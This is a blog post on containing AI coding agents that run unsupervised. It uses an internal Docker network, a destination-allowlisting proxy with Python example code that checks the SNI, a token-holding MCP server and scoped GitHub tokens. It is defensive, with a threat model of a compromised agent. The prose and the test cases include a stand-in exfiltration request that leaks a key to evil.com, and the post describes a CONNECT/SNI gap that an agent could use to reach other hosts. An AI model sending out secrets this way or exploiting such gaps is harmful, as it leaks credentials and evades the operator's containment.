How I sleep at night running agents in YOLO mode
A simple setup to restrict AI coding agents, while keeping them useful.
Alright, I run my agents in YOLO mode. And instead of waking up braced for a disaster, I sleep fine.
I didn’t fix it by making the agent careful. Carefulness is not something you can rely on. The fix is at the architecture level, not “please, don’t make a mistake.” The agent can be fully compromised, even actively malicious, and the worst it can do is open a PR.
Here’s the setup.
The agent runs in a container with no cloud CLIs (no az, aws, gcloud or the like). So how does it do cloud work? A small MCP server runs next to it and holds the token. The agent calls a few tools (list resource groups, whoami) and gets answers back. It never sees the token, so even a compromised agent can only ask for the read-only things the token allows, and only through the tools the server exposes. The MCP server has to live outside the agent’s container for this to mean anything; it can be on the same host or in another container.
The only CLIs in the agent’s container are git, gh (GitHub) and whatever is needed to build and test. Even if curl and friends end up in the image, they go nowhere unless they are explicitly pointed at the proxy, and then the proxy decides where they can go. What proxy? The one that limits internet access.
The agent container sits on a Docker network marked internal, so there’s no gateway out and any packet to a random IP gets dropped by the kernel. The one and only way out is a proxy container that sits on both the sealed network and the open one, and everything the agent sends to the internet goes through it. A compromised agent can’t skip the proxy, because there’s nowhere else to go.
The proxy filters on destination, not the request method. This is because you can leak a secret in a GET (GET evil.com/?key=AKIA...). What matters is where the request can go. The proxy allows a short list (GitHub, the package registry, a couple of docs sites) and blocks everything else. evil.com is unreachable no matter how you send the request.
There’s one channel I leave open: the agent can open PRs (and create GitHub issues). A PR title and body are writable, so that’s data going out. But opening PRs is the whole job, so I clamp it instead of closing it. GitHub’s fine-grained PATs can be scoped to just the repositories you pick, with read/write only on the private repos the agent works in. No pushing to a public fork to sneak data out.
So if the agent tries to do something stupid, like deleting a database or sending my secrets to someone, the safeguards above block it. The actual worst case is that it opens a bad PR or trashes its own filesystem. I can live with those outcomes.
The setup has one known gap. The proxy trusts the hostname in the client’s CONNECT request and doesn’t check it against the SNI in the TLS handshake that follows, so an attacker inside the container could route to a different host. The proxy can check the actual handshake; I just haven’t turned that on in this version.
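To make the two proxy points concrete (filter on destination, not method; and close the CONNECT/SNI gap), here is an added example of the decision logic such a proxy needs. It is illustration code written for this post, not the proxy from the repo, and the allowlist and request shapes are assumptions: it takes standard forward-proxy syntax (CONNECT host:port for TLS, absolute-form URLs for cleartext) and a placeholder list of hosts.

```python
"""Destination-allowlist proxy decision with an SNI cross-check.

Added illustration, not the author's proxy. Assumed: HTTP/1.1 forward-proxy
request lines, and a placeholder allowlist (ALLOWED_HOSTS) standing in for
whatever the real setup permits.
"""
import struct
from urllib.parse import urlsplit

# Assumed allowlist: GitHub, a package registry, a docs site.
ALLOWED_HOSTS = frozenset({
    "github.com", "api.github.com", "objects.githubusercontent.com",
    "pypi.org", "files.pythonhosted.org", "docs.python.org",
})


def normalize(host):
    return host.strip().lower().rstrip(".")


def requested_destination(request_line):
    """Return (method, host) from a proxy request line; host is None if unparseable."""
    parts = request_line.decode("ascii", "replace").split()
    if len(parts) != 3:
        return None, None
    method, target = parts[0], parts[1]
    if method == "CONNECT":                     # CONNECT host:port HTTP/1.1
        host, sep, port = target.rpartition(":")
        if not sep or not port.isdigit():
            return method, None
        return method, normalize(host.strip("[]"))
    parsed = urlsplit(target)                   # GET http://host/path HTTP/1.1
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return method, None
    return method, normalize(parsed.hostname)


def sni_from_client_hello(data):
    """Extract server_name from a TLS ClientHello record; None if absent or malformed."""
    try:
        if data[0] != 0x16:                     # TLS handshake record
            return None
        rec_len = struct.unpack_from("!H", data, 3)[0]
        hs = data[5:5 + rec_len]
        if hs[0] != 0x01:                       # ClientHello
            return None
        pos = 4 + 2 + 32                        # handshake header, version, random
        pos += 1 + hs[pos]                      # session id
        pos += 2 + struct.unpack_from("!H", hs, pos)[0]  # cipher suites
        pos += 1 + hs[pos]                      # compression methods
        ext_total = struct.unpack_from("!H", hs, pos)[0]
        pos += 2
        end = pos + ext_total
        while pos + 4 <= end:
            ext_type, ext_len = struct.unpack_from("!HH", hs, pos)
            pos += 4
            if ext_type == 0:                   # server_name extension
                if hs[pos + 2] != 0:            # name type must be host_name
                    return None
                name_len = struct.unpack_from("!H", hs, pos + 3)[0]
                return normalize(hs[pos + 5:pos + 5 + name_len].decode("ascii"))
            pos += ext_len
    except (IndexError, struct.error, UnicodeError):
        return None
    return None


def decide(request_line, first_bytes=b""):
    """Allow/deny a proxied request. first_bytes: what the client sends after CONNECT."""
    method, host = requested_destination(request_line)
    if host is None:
        return False, "unparseable destination"
    if host not in ALLOWED_HOSTS:               # destination decides, not the method
        return False, f"{host} not in allowlist"
    if method != "CONNECT":
        return True, f"forward to {host}"
    sni = sni_from_client_hello(first_bytes)    # close the gap: check the real handshake
    if sni is None:
        return False, "no SNI in ClientHello"
    if sni != host:
        return False, f"SNI {sni} does not match CONNECT host {host}"
    return True, f"tunnel to {host}"


def build_client_hello(server_name):
    """Constructed test input: a minimal TLS 1.2 ClientHello carrying one SNI entry."""
    name = server_name.encode("ascii")
    sni_entry = b"\x00" + struct.pack("!H", len(name)) + name
    sni_body = struct.pack("!H", len(sni_entry)) + sni_entry
    extensions = struct.pack("!HH", 0, len(sni_body)) + sni_body
    body = (b"\x03\x03" + bytes(32)             # client_version, random
            + b"\x00"                           # session id length 0
            + struct.pack("!H", 2) + b"\x13\x01"  # one cipher suite
            + b"\x01\x00"                       # compression: null only
            + struct.pack("!H", len(extensions)) + extensions)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


if __name__ == "__main__":
    for line, payload in [
        (b"CONNECT github.com:443 HTTP/1.1", build_client_hello("github.com")),
        (b"CONNECT github.com:443 HTTP/1.1", build_client_hello("evil.com")),
        (b"GET http://evil.com/?key=AKIA... HTTP/1.1", b""),
    ]:
        print(line.decode(), "->", decide(line, payload))
```

The GET-with-a-secret case is denied purely because evil.com is not on the list; no inspection of the query string is needed. Refusing a tunnel with no SNI at all is a deliberate choice here: it breaks a few odd clients, but it removes the case where the proxy has nothing to compare against.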
It’s not much to build and it’s all in the repo. I’ve included the prompt you can copy and paste to build this for your own setup.


